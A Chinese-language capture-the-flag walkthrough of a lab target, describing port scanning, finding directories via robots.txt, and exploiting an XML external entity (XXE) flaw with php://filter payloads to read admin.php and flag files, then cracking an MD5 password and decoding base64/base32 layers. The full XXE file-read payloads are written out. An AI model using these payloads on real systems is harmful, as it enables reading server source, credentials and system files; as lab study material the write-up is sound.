首先我们进行端口扫描

扫出来端口之后去尝试得出地址为183

发现robots.txt文件

由此我们就得到了两个目录

我们先进入xxe目录，并开始登录抓包

并进入重放器在xml里面构造语句

<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY admin SYSTEM "php://filter/read=convert.base64-encode/resource=admin.php">
]>

把那些码复制下来进行base64解码

解码完成后放下翻发现有用户名和密码，用户名为administhebest，但是密码是被md5加密的

那么我们把密码复制下来去md5解密，得出密码admin@123

然后我们去尝试登录

看到一个flag我们点击查看

进入xee目录进行抓包并读取文件

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY admin SYSTEM "php://filter/read=convert.base64-encode/resource=./flagmeout.php">
]>
<root><name>&admin;</name><password>admin</password></root>

又得到一段编码复制下来进行base64解码

然后再对括号里的进行base32解码

发现还得进行base64解码把base32解码完成之后的复制进行64解码

得到了flag的目录那么我们再次进入到xee目录的界面进行抓包读取

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY admin SYSTEM "php://filter/read=convert.base64-encode/resource=/etc/.flag.php">
]>
<root><name>&admin;</name><password>admin</password></root>

我们再次进行base64解码

解码之后得出一段php代码

我们打开小皮面板进入自己网站的根目录，创建一个php文件进行访问

把刚刚解码的php代码复制进去，并加上<?php 的开头

保存然后进行访问

这里报错找不到页面肯能是php版本的问题，我们进入小皮->网站->管理->php版本，更换一个版本

这里我改成5.3.29了

下载成功后再进入php版本进行切换

换了之后看到报错内容里面有flag在花括号里